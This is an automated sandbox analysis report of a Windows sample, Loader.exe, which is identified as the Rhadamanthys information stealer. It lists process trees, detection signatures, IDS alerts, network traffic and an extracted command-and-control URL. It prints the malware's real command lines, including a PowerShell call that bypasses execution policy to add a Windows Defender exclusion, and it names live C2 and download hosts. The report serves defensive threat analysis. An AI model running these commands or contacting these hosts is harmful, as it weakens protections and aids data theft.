Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1579550
MD5:031bafff0a790efc6955a90dafc6d0e1
SHA1:266b3e8d18b4440330cc857df33813c4be52545a
SHA256:ee0d10d2321499903ad1b0105e27ed80cf19c595b8cd5ab2249e146d983c8495
Tags:exeuser-aachum
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Overwrites Mozilla Firefox settings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Explorer Process Tree Break
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • Loader.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 031BAFFF0A790EFC6955A90DAFC6D0E1)
    • CampaignHardwareLauncher.exe (PID: 6204 cmdline: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe MD5: ABE04EC3EDDF9D00B7E948E5404E172C)
      • javaw.exe (PID: 5908 cmdline: "C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;ddfrt658\jphp-gui-ext.jar;ddfrt658\jphp-gui-jfoenix-ext.jar;ddfrt658\jphp-json-ext.jar;ddfrt658\jphp-jsoup-ext.jar;ddfrt658\jphp-runtime.jar;ddfrt658\jphp-xml-ext.jar;ddfrt658\jphp-zend-ext.jar;ddfrt658\jphp-zip-ext.jar;ddfrt658\jsoup.jar;ddfrt658\slf4j-api.jar;ddfrt658\slf4j-simple.jar;ddfrt658\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher MD5: 48C96771106DBDD5D42BBA3772E4B414)
        • cmd.exe (PID: 2516 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1088 cmdline: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 3852 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • explorer.exe (PID: 3836 cmdline: explorer C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • explorer.exe (PID: 5244 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 662F4F92FDE3557E86D110526BB578D5)
    • medicalanalysispro.exe (PID: 7164 cmdline: "C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exe" MD5: 178A2A89CB76EFEA6DF50CC884991226)
      • medicalanalysis.exe (PID: 5648 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe MD5: 443B43ADCB78164D40C977ABAC54C18E)
        • InstallUtil.exe (PID: 3148 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
          • svchost.exe (PID: 6100 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • svchost.exe (PID: 6588 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • chrome.exe (PID: 5884 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr34F8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c462449b" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
                • chrome.exe (PID: 6780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2864 --field-trial-handle=2760,i,8911409876451875060,10497288921933201454,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • msedge.exe (PID: 4760 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr417C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/446d3de0/c7af6c55" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 2020 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3232 --field-trial-handle=2952,i,15376106981167102888,3693365573348808806,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
              • wmplayer.exe (PID: 7388 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)
          • WerFault.exe (PID: 3252 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 348 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • medicallanalysis.exe (PID: 5796 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe MD5: 2DBC39DCE4C3B66019E84A28A342EAD0)
        • cmd.exe (PID: 3792 cmdline: "cmd.exe" /C timeout 1 && del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6984 cmdline: timeout 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000003.2844637112.0000000004D10000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000010.00000003.2840379092.00000000003E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      0000000D.00000002.2831006942.00000000026E7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000010.00000003.2844199525.0000000004AF0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000010.00000002.2935727529.0000000002BF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.medicalanalysis.exe.5940000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              16.3.svchost.exe.4af0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                16.3.svchost.exe.4d10000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  16.3.svchost.exe.4d10000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, ProcessId: 1088, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, ProcessId: 1088, ProcessName: powershell.exe
                    Sigma detected: Explorer Process Tree Break
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber: Data: Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 752, ProcessCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ProcessId: 5244, ProcessName: explorer.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, ProcessId: 1088, ProcessName: powershell.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 3148, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6100, ProcessName: svchost.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE, ProcessId: 1088, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ParentProcessId: 3148, ParentProcessName: InstallUtil.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6100, ProcessName: svchost.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-22T23:54:57.147487+010028548242Potentially Bad Traffic104.37.175.2187982192.168.2.549929TCP
                    2024-12-22T23:55:08.286084+010028548242Potentially Bad Traffic104.37.175.2187982192.168.2.549959TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-22T23:54:30.170802+010028548021Domain Observed Used for C2 Detected104.37.175.2187982192.168.2.549859TCP
                    2024-12-22T23:54:57.147487+010028548021Domain Observed Used for C2 Detected104.37.175.2187982192.168.2.549929TCP
                    2024-12-22T23:55:08.286084+010028548021Domain Observed Used for C2 Detected104.37.175.2187982192.168.2.549959TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: Loader.exeAvira: detected
                    Found malware configuration
                    Source: 13.2.medicalanalysis.exe.3840c28.0.raw.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o"}
                    Multi AV Scanner detection for submitted file
                    Source: Loader.exeVirustotal: Detection: 27%Perma Link
                    Source: Loader.exeReversingLabs: Detection: 23%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,12_2_00007FF7600A30EC
                    Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\README.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME-JAVAFX.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME-JAVAFX.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME.txtJump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME.txtJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 5.2.81.126:443 -> 192.168.2.5:49736 version: TLS 1.2
                    Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^(kdw&k source: javaw.exe, 00000003.00000002.4549234661.000000006B249000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: msvcr100.i386.pdb source: javaw.exe, 00000003.00000002.4553754247.000000006C301000.00000020.00000001.01000000.00000008.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000003.00000002.4551278707.000000006BE77000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000003.00000002.4551278707.000000006BE77000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000003.00000002.4551788732.000000006BEEA000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: msvcp120.i386.pdb source: javaw.exe, 00000003.00000002.4550390578.000000006BD01000.00000020.00000001.01000000.00000010.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000003.00000002.4549234661.000000006B249000.00000002.00000001.01000000.00000014.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000003.00000002.4551504864.000000006BECD000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: medicalanalysis.exe
                    Source: Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: Loader.exe, 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                    Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000003.00000000.2174031864.000000000075C000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000003.00000002.4531740229.000000000075C000.00000002.00000001.01000000.00000007.sdmp
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeCode function: 12_2_00007FF7600A204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,12_2_00007FF7600A204C
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\Jump to behavior
                    Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\clientJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h13_2_04AA0DE0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h13_2_04AA0DD5
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 0571DE68h13_2_0571DDB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 0571DE68h13_2_0571DDA8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 05A37BD0h13_2_05A37B50
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeCode function: 4x nop then jmp 05A37BD0h13_2_05A37B17
                    Source: chrome.exeMemory has grown: Private usage: 1MB later: 21MB

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.5:49859
                    Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.5:49929
                    Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.218:7982 -> 192.168.2.5:49959
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.37.175.218 7982
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://104.37.175.218:7982/da03ab84e7f8187e6/v3iuaiea.tsf2o
                    Source: global trafficTCP traffic: 192.168.2.5:49859 -> 104.37.175.218:7982
                    Source: global trafficHTTP traffic detected: GET /temp/Nomrwfj.mp4 HTTP/1.1Host: erdogansigorta.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 213.239.239.164 213.239.239.164
                    Source: Joe Sandbox ViewIP Address: 194.58.203.20 194.58.203.20
                    Source: Joe Sandbox ViewASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 104.37.175.218:7982 -> 192.168.2.5:49929
                    Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 104.37.175.218:7982 -> 192.168.2.5:49959
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
